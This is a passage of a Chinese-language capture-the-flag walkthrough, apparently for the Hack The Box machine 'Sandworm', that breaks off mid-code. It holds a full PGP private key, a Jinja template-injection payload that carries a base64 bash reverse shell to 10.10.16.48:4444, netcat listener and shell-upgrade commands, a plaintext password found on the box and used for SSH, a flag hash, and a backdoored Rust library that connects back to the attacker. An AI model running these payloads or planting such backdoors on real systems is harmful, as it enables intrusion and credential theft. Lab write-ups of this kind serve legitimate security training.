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
=/YXP
-----END PGP PRIVATE KEY BLOCK-----
制作和验证签名
┌──(root㉿kali)-[~/Desktop]
└─# echo 'life-time'|gpg --clear-sign
┌──(root㉿kali)-[~/Desktop]
└─# echo 'life-time'|gpg --clear-sign
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512
life-time
-----BEGIN PGP SIGNATURE-----
iQGyBAEBCgAdFiEEmdxh848T1r2yc2sljiKfWGUL+z4FAmSdmXoACgkQjiKfWGUL
+z4BqQv44IchdXncKQYSbLmxrhsYSonbEc1s4oIsA2IeErTUHdwikjAJ9HE7xDjx
dfUBhQNDrBpr0ZwuNPtcA+2w6/N5cyCT8i29skG4Oh2s59qSZc8MXtOecI6jPv3i
Uc5z0XxQlUgRXtO11E2mx125IZZD5CkAlLfpPwrU6eDHWRsk03wyBTYz8kj0Xk3u
ZYRljKjTvYICLD39sy+W93Hi9matS89ud/sPjsPFvNfgOlwZoScJCxpqLQ5fGn5b
LGZqgBDVdFb4LdrCuTo6NdP919oywvmmCtPBkLpdnk6zVAtggDs7vJW3LAy+MkFM
KaEWxX2GBlGHeTdzSIpHtzCVYF1uMihKH8/JdgQCFKGWQDy8uZxvX1WBlBfSm4UE
Wm0Ts9nCP28c91mvfH2IrmR55St+v057vQ1OTIuqXxYEXu2HkRTY0EiZdXdgc8Mc
esvp8bhfnfHeggIbUczFGBjf71vdGYCFJMvivZGByB4dI3TY3gGChsY54yD4+egM
wSK3cnU=
=7bQW
-----END PGP SIGNATURE-----
这里我们的 {{7*7}} 成功变成了 49,证明确实存在 SSTI 漏洞
反弹 Shell
┌──(root㉿kali)-[~/Desktop]
└─# echo "bash -i >& /dev/tcp/10.10.16.48/4444 0>&1"|base64
YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNi40OC80NDQ0IDA+JjEK
首先我们将 reverse shell 转换为 base64 编码
{{ self.__init__.__globals__.__builtins__.__import__('os').popen('echo "YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNi40OC80NDQ0IDA+JjEK" | base64 -d | bash').read() }}
然后构造我们的 Reverse Shell
┌──(root㉿kali)-[~/Desktop]
└─# gpg --edit-key [email protected]
gpg (GnuPG) 2.2.40; Copyright (C) 2022 g10 Code GmbH
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
私钥可用。
gpg: 正在检查信任度数据库
gpg: marginals needed: 3 completes needed: 1 trust model: pgp
gpg: 深度:0 有效性: 1 已签名: 0 信任度:0-,0q,0n,0m,0f,1u
gpg: 下次信任度数据库检查将于 2025-06-28 进行
sec rsa3072/8E229F58650BFB3E
创建于:2023-06-29 有效至:2025-06-28 可用于:SC
信任度:绝对 有效性:绝对
ssb rsa3072/DA683892A79B6B19
创建于:2023-06-29 有效至:2025-06-28 可用于:E
[ 绝对 ] (1). {{7*7}} <[email protected]>
gpg> adduid
真实姓名: {{ self.__init__.__globals__.__builtins__.__import__('os').popen('echo "YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNi40OC80NDQ0IDA+JjEK" | base64 -d | bash').read() }}
电子邮件地址: [email protected]
注释:
您选定了此用户标识:
“{{ self.__init__.__globals__.__builtins__.__import__('os').popen('echo "YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNi40OC80NDQ0IDA+JjEK" | base64 -d | bash').read() }} <[email protected]>”
更改姓名(N)、注释(C)、电子邮件地址(E)或确定(O)/退出(Q)? o
sec rsa3072/8E229F58650BFB3E
创建于:2023-06-29 有效至:2025-06-28 可用于:SC
信任度:绝对 有效性:绝对
ssb rsa3072/DA683892A79B6B19
创建于:2023-06-29 有效至:2025-06-28 可用于:E
[ 绝对 ] (1) {{7*7}} <[email protected]>
[ 未知 ] (2). {{ self.__init__.__globals__.__builtins__.__import__('os').popen('echo "YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNi40OC80NDQ0IDA+JjEK" | base64 -d | bash').read() }} <[email protected]>
gpg> trust
sec rsa3072/8E229F58650BFB3E
创建于:2023-06-29 有效至:2025-06-28 可用于:SC
信任度:绝对 有效性:绝对
ssb rsa3072/DA683892A79B6B19
创建于:2023-06-29 有效至:2025-06-28 可用于:E
[ 绝对 ] (1) {{7*7}} <[email protected]>
[ 未知 ] (2). {{ self.__init__.__globals__.__builtins__.__import__('os').popen('echo "YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNi40OC80NDQ0IDA+JjEK" | base64 -d | bash').read() }} <[email protected]>
请决定您对这名用户能否正确地验证其他用户密钥
(通过查看护照,检查不同来源的的指纹等等)的相信程度
1 = 我不知道或不作答
2 = 我不相信
3 = 我勉强相信
4 = 我完全相信
5 = 我绝对相信
m = 回到主菜单
您的决定是什么? 5
您真的要把这个密钥设置成绝对信任?(y/N) y
sec rsa3072/8E229F58650BFB3E
创建于:2023-06-29 有效至:2025-06-28 可用于:SC
信任度:绝对 有效性:绝对
ssb rsa3072/DA683892A79B6B19
创建于:2023-06-29 有效至:2025-06-28 可用于:E
[ 绝对 ] (1) {{7*7}} <[email protected]>
[ 未知 ] (2). {{ self.__init__.__globals__.__builtins__.__import__('os').popen('echo "YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNi40OC80NDQ0IDA+JjEK" | base64 -d | bash').read() }} <[email protected]>
gpg> uid 1
sec rsa3072/8E229F58650BFB3E
创建于:2023-06-29 有效至:2025-06-28 可用于:SC
信任度:绝对 有效性:绝对
ssb rsa3072/DA683892A79B6B19
创建于:2023-06-29 有效至:2025-06-28 可用于:E
[ 绝对 ] (1)* {{7*7}} <[email protected]>
[ 未知 ] (2). {{ self.__init__.__globals__.__builtins__.__import__('os').popen('echo "YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNi40OC80NDQ0IDA+JjEK" | base64 -d | bash').read() }} <[email protected]>
gpg> deluid
真的要移除此用户标识吗?(y/N) y
sec rsa3072/8E229F58650BFB3E
创建于:2023-06-29 有效至:2025-06-28 可用于:SC
信任度:绝对 有效性:绝对
ssb rsa3072/DA683892A79B6B19
创建于:2023-06-29 有效至:2025-06-28 可用于:E
[ 未知 ] (1). {{ self.__init__.__globals__.__builtins__.__import__('os').popen('echo "YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNi40OC80NDQ0IDA+JjEK" | base64 -d | bash').read() }} <[email protected]>
gpg> save
导出公钥
┌──(root㉿kali)-[~/Desktop]
└─# ┌──(root㉿kali)-[~/Desktop]
└─# gpg --armor --export [email protected] > public.key
┌──(root㉿kali)-[~/Desktop]
└─# cat public.key
-----BEGIN PGP PUBLIC KEY BLOCK-----
mQGNBGSdlHIBDADT20d9aSJjEaF5etEV39gJBLc7c35Q7cgwBUi9aW0FcrcYYWV5
AJJ2xloIWbavsgG1bjPo2SwgP0iRscX6yFRQ21OtVibkWB6fRfi7BWxc/mxEo0XU
lFO4ufb2taRMRmlxvg78xwia7WXIVF+UR/iHJeH/U+UbVh0hFZNQKrKiRHlzWagb
yGhNz8LDHMIPWUp1AiVqoMNXv4TwRM+SUMsQi7K862oixnJAjrgThIn6bwOPNnPm
spi7QUj8JcjEBvicVXlCaD1WkfkeNDHMq1xH3LW5/2gzTauouLsxBdAv3soImLXE
huyxG5arc6oekAGJ3wpizA1g8pJQ5DnUUe419cBnL0M+tMgZMboOauEOP1BLD9ZH
pwaktBoQnUXaj4jY3jHFHhyP+rWDvcFJshm/zy05nAKqRtA8cidlYtEpAuJrAArM
hwg6v73HVkpjiSWFihYRZhBUtjJsEekUzx7eyZtkb+KH7wmBqEgpBPoNZJR7HjD5
SohFOy3XWJe87UcAEQEAAbS2e3sgc2VsZi5fX2luaXRfXy5fX2dsb2JhbHNfXy5f
X2J1aWx0aW5zX18uX19pbXBvcnRfXygnb3MnKS5wb3BlbignZWNobyAiWW1GemFD
QXRhU0ErSmlBdlpHVjJMM1JqY0M4eE1DNHhNQzR4Tmk0ME9DODBORFEwSURBK0pq
RUsiIHwgYmFzZTY0IC1kIHwgYmFzaCcpLnJlYWQoKSB9fSA8THVjaWZpZWxIYWNr
QHFxLmNvbT6JAdQEEwEKAD4WIQSZ3GHzjxPWvbJzayWOIp9YZQv7PgUCZJ2cCAIb
AwUJA8JnAAULCQgHAgYVCgkICwIEFgIDAQIeAQIXgAAKCRCOIp9YZQv7PjmbDACL
xvM6NGYzKAvWSq8+YCFaoGayRrmdcxyFHVx/E06QaQGjyF8QSwA8xrvZR+/gT4Us
giFIgllk+n5s3Pu84S+TQir5AEMb68MAMHGXdGUqqv8KI82X90z8x9QZxOw7hHPU
rSp+uPecitxtI2j6uNNr/hx2KPTGlgyP+ns6NiAjGu+jIs0Z8fCtEzRTfcjgmYC3
aMgrfWmqy/S8E0TISNYm9htN8o9b+E1iVNCcE+Jc4BJULJnWwpEgjhsER0aWdCIM
OHuLHBCSGKKHFA0qmi39wuTWcjS3cd6NFVN4OVr124IKjV1vE/0Wo6VlSW1UuLYi
Zau812E1KwsVH/ASo1tcYCpmw282wt8zhICyJATPNExIjsTexMQoAtuNPFN2rs8k
7Km3yXy1jv29D2qw4RFjXYhcWNtnkzNG0B678w4uDOlU5wsge3slLdhx9jWXcE8d
PomLxGrC56KNbpfpMrWVMt2WoXzvavLY05lzGkKzJTXESIQ8lvA8RkVNMlDpf4u5
AY0EZJ2UcgEMANbLfcUVhcrdZuaRl4NnmzKabZ3swIZmBSO5ICQCw12Jqr6KlVa2
vFPtdOdTMnJwrGGJYqCEamek4M6RILovlxOfdDLaY+49TjEnDev+6GRk18OAO6gk
MYPpCfuBFk3XIK49p3BH9ucJQzMvJ6oa29L2a/pmlw5kA/aUDUteXJZUfHSYSd91
MBQQ8oIUzHe2SDB9effwtKWdM6IjWviZ5TpILF8v4HItueVE5dinxTZIaxHko0d0
RcEQV9zdjkZ1ZQjFVJr5Awz6JQGhf7lcPN60YxZAv++3hbtN7tv7l3jJuWxdDwsB
AAgOxuzk9Y7QmFdNAW9xhSLL3Ee4cWaj+RXq5hP9Cw60MzfpDaXHyY/TOtCC6VU3
u6ERRAfQ0GwmfSHzJZJtIVCu08NE3SOriLHbvGggdUTwlXtqaHg4PfLMwvMEEHN3
w/PmLGAE4bPmjUIB9tieloLMW/aJA79W7kcKpsy355dEZUojtzX7kRXm+ud30hqY
UKrVy5EvGypDkQARAQABiQG8BBgBCgAmFiEEmdxh848T1r2yc2sljiKfWGUL+z4F
AmSdlHICGwwFCQPCZwAACgkQjiKfWGUL+z7cXgv+LvtkBNdMqg5GcG3+/Ly6B1os
/jkR3R0bOO27CrUOw/Yt4KY71/Eza3+evid6u3qmBjVaIg09qZdDySThV/wVX0zP
1H095nIcNCxqFt8YIMjx9VfyI4yCYTWVEEYPlgTVEPkpJEFrd98v9HS3lZbEJ5Ha
Jxdp5/n09HhzfCHyNo4lVSgkeJr7Zo37/tppIUAgIWRzXHg+f0du0087K8Q0KVO8
OkKtfGoXWB/4wrPMeQMVaOke5SjN3T03OGrit462wYi4Iaucbck6qI3HjLCsjQat
GNV2yIbVbhIH1oAznu6Gd3XxbDrXOLvWtt8RkWDDPbblz/2EiC14VPhkPtJe9o0t
gryqJixVfFjdlTU+8ZlPCAsCz/YVt+S38arMHmC3BZh7ceS4v/Vy740SY07tObWJ
/vaVHQ6lSU+f8NSqWn3z1xMCzxGonvHwsvRf7j7xEL4beVotg1UkNkaLJqnTWBfq
km/7RKYnKVv+BiwNF0LUjNFQf3rBzKxViXyy51/Z
=vr51
-----END PGP PUBLIC KEY BLOCK-----
制作和验证签名
┌──(root㉿kali)-[~/Desktop]
└─# echo 'life-time'|gpg --clear-sign --out signed_message.key
┌──(root㉿kali)-[~/Desktop]
└─# cat signed_message.key
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512
life-time
-----BEGIN PGP SIGNATURE-----
iQGzBAEBCgAdFiEEmdxh848T1r2yc2sljiKfWGUL+z4FAmSdnkAACgkQjiKfWGUL
+z6ufgwA0imOKszK563JTpz9aRBZxdtNne4Y14u7FFHjgTT7UVQabBOeN143fnqv
BIS9/6KcHa4gurrnU87ouf/YNxgC2FPZ5k1nDY04iJJDnnkMEvpiSNgmWy2frIvp
gfLRd4kDJpwnkC6NE7ur8wxkcn2cpSUTsOgsVMhksazfAX6LJpOYmVSuwTRg6UYb
qKJnfeD7yDsXMV3kfGE9Kt3mo2uCnTKoomjKMYpnx4ZpP0Dcj8joxRXRFhP/UVbG
RGNlksQDGDBbA0Stfu90zyOYmLRZXwuxiDb4xUHKA9PC4fu8fjk6/pA4rWiKXiU2
WaZ5KRUxoPTxI8w3GUUae+R9fXPDBlAuICSLnM/Rbxo6pMZ3LOg5bgzUsIJhm63N
xCdJUB1bjQ8NXvNpy+dKZa3vd33M1kqq/MdzUnUQ0n6+M4LwUGoZYr+waO3XG2K1
4SVSgMlT36X9oKToDe93azhWwbGRcGNSkoo2EuADEjv5S7YfT/w8x8hvGfwfqmEI
Lf9gYb/D
=26lf
-----END PGP SIGNATURE-----
监听端口
nc -nvlp 4444
┌──(root㉿kali)-[~/Desktop]
└─# nc -nvlp 4444
listening on [any] 4444 ...
connect to [10.10.16.48] from (UNKNOWN) [10.10.11.218] 55382
bash: cannot set terminal process group (-1): Inappropriate ioctl for device
bash: no job control in this shell
/usr/local/sbin/lesspipe: 1: dirname: not found
atlas@sandworm:/var/www/html/SSA$ whoami&&id^M
直接按回车会变成 ^M,去解决下伪终端的问题
Ctrl+Z 返回
stty raw -echo; fg
export TERM=xterm
stty rows 51 cols 237
python3 -c "import pty;pty.spawn('/bin/bash')";
即可成功解决这个问题
atlas@sandworm:/var/www/html/SSA$ whoami
Could not find command-not-found database. Run 'sudo apt update' to populate it.
whoami: command not found
atlas@sandworm:/var/www/html/SSA$ id
uid=1000(atlas) gid=1000(atlas) groups=1000(atlas)
atlas@sandworm:/var/www/html/SSA$ ls
SSA
atlas@sandworm:/var/www/html/SSA$ cd SSA
atlas@sandworm:/var/www/html/SSA/SSA$ ls
app.py models.py src submissions
__init__.py __pycache__ static templates
成功拿到一个 shell,但是这里看着像是在容器里,而且也没有 flag
权限提升
silentobserver
atlas@sandworm:~$ ls -la
total 44
drwxr-xr-x 8 atlas atlas 4096 Jun 7 13:44 .
drwxr-xr-x 4 nobody nogroup 4096 May 4 15:19 ..
lrwxrwxrwx 1 nobody nogroup 9 Nov 22 2022 .bash_history -> /dev/null
-rw-r--r-- 1 atlas atlas 220 Nov 22 2022 .bash_logout
-rw-r--r-- 1 atlas atlas 3771 Nov 22 2022 .bashrc
drwxrwxr-x 2 atlas atlas 4096 Jun 6 08:49 .cache
drwxrwxr-x 3 atlas atlas 4096 Feb 7 10:30 .cargo
drwxrwxr-x 4 atlas atlas 4096 Jan 15 07:48 .config
drwx------ 4 atlas atlas 4096 Jun 29 15:10 .gnupg
drwxrwxr-x 6 atlas atlas 4096 Feb 6 10:33 .local
-rw-r--r-- 1 atlas atlas 807 Nov 22 2022 .profile
drwx------ 2 atlas atlas 4096 Feb 6 10:34 .ssh
在用户目录下有一个 .config文件夹
atlas@sandworm:~/.config$ ls -la
total 12
drwxrwxr-x 4 atlas atlas 4096 Jan 15 07:48 .
drwxr-xr-x 8 atlas atlas 4096 Jun 7 13:44 ..
dr-------- 2 nobody nogroup 40 Jun 29 08:31 firejail
drwxrwxr-x 3 nobody atlas 4096 Jan 15 07:48 httpie
.config目录下有firejail,确认是在沙箱中
atlas@sandworm:~/.config/httpie/sessions/localhost_5000$ ls -la
total 12
drwxrwx--- 2 nobody atlas 4096 May 4 17:30 .
drwxrwxr-x 3 nobody atlas 4096 Jan 15 07:48 ..
-rw-r--r-- 1 nobody atlas 611 May 4 17:26 admin.json
atlas@sandworm:~/.config/httpie/sessions/localhost_5000$ cat admin.json
{
"__meta__": {
"about": "HTTPie session file",
"help": "https://httpie.io/docs#sessions",
"httpie": "2.6.0"
},
"auth": {
"password": "quietLiketheWind22",
"type": null,
"username": "silentobserver"
},
"cookies": {
"session": {
"expires": null,
"path": "/",
"secure": false,
"value": "eyJfZmxhc2hlcyI6W3siIHQiOlsibWVzc2FnZSIsIkludmFsaWQgY3JlZGVudGlhbHMuIl19XX0.Y-I86w.JbELpZIwyATpR58qg1MGJsd6FkA"
}
},
"headers": {
"Accept": "application/json, */*;q=0.5"
}
}
最后在 /home/atlas/.config/httpie/sessions/localhost_5000/admin.json中发现了用户 silentobserver的密码quietLiketheWind22
Username = silentobserver
Password = quietLiketheWind22
┌──(root㉿kali)-[~/Desktop]
└─# ssh [email protected]
[email protected]'s password:
Welcome to Ubuntu 22.04.2 LTS (GNU/Linux 5.15.0-73-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Thu Jun 29 03:21:56 PM UTC 2023
System load: 0.0
Usage of /: 89.6% of 11.65GB
Memory usage: 22%
Swap usage: 0%
Processes: 215
Users logged in: 0
IPv4 address for eth0: 10.10.11.218
IPv6 address for eth0: dead:beef::250:56ff:feb9:e9e3
=> / is using 89.6% of 11.65GB
=> There is 1 zombie process.
Expanded Security Maintenance for Applications is not enabled.
0 updates can be applied immediately.
Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Thu Jun 29 15:21:58 2023 from 10.10.16.48
silentobserver@sandworm:~$ whoami&&id
silentobserver
uid=1001(silentobserver) gid=1001(silentobserver) groups=1001(silentobserver)
成功得到一个 User 权限的 Shell
silentobserver@sandworm:~$ cat user.txt
8a61464d123533ae2536d7e54644b889
成功得到 User 权限的 Flag 文件
Root
2023/06/29 15:30:01 CMD: UID=0 PID=495842 | /bin/sh -c cd /opt/tipnet && /bin/echo "e" | /bin/sudo -u atlas /usr/bin/cargo run --offline
运行 pspy,检测到 root 用户正在用户 atlas 的上下文中运行用 Rust 开发的 tipnet 项目
tipnet
silentobserver@sandworm:/opt/tipnet/target/debug$ ./tipnet
,,
MMP""MM""YMM db `7MN. `7MF' mm
P' MM `7 MMN. M MM
MM `7MM `7MMpdMAo. M YMb M .gP"Ya mmMMmm
MM MM MM `Wb M `MN. M ,M' Yb MM
MM MM MM M8 M `MM.M 8M"""""" MM
MM MM MM ,AP M YMM YM. , MM
.JMML. .JMML. MMbmmd'.JML. YM `Mbmmd' `Mbmo
MM
.JMML.
Select mode of usage:
a) Upstream
b) Regular (WIP)
c) Emperor (WIP)
d) SQUARE (WIP)
e) Refresh Indeces
logger
silentobserver@sandworm:/opt/crates/logger/src$ cat lib.rs
extern crate chrono;
use std::fs::OpenOptions;
use std::io::Write;
use chrono::prelude::*;
pub fn log(user: &str, query: &str, justification: &str) {
let now = Local::now();
let timestamp = now.format("%Y-%m-%d %H:%M:%S").to_string();
let log_message = format!("[{}] - User: {}, Query: {}, Justification: {}n", timestamp, user, query, justification);
let mut file = match OpenOptions::new().append(true).create(true).open("/opt/tipnet/access.log") {
Ok(file) => file,
Err(e) => {
println!("Error opening log file: {}", e);
return;
}
};
if let Err(e) = file.write_all(log_message.as_bytes()) {
println!("Error writing to log file: {}", e);
}
}
需要把 lib.rs修改为我们自己的内容
//Just put the below code in lib.rs
extern crate chrono;
use std::fs::OpenOptions;
use std::io::Write;
use chrono::prelude::*;
use std::net::TcpStream;
use std::os::unix::io::{AsRawFd, FromRawFd};
use std::process::{Command, Stdio};
pub fn log(user: &str, query: &str, justification: &str) {
let now = Local::now();
let timestamp = now.format("%Y-%m-%d %H:%M:%S").to_string();
let log_message = format!("[{}] - User: {}, Query: {}, Justification: {}n", timestamp, user, query, justification);
let mut file = match OpenOptions::new().append(true).create(true).open("/opt/tipnet/access.log") {
Ok(file) => file,
Err(e) => {
println!("Error opening log file: {}", e);
return;
}
};
if let Err(e) = file.write_all(log_message.as_bytes()) {
println!("Error writing to log file: {}", e);
}
let sock = TcpStream::connect("10.10.16.48:4444").unwrap();
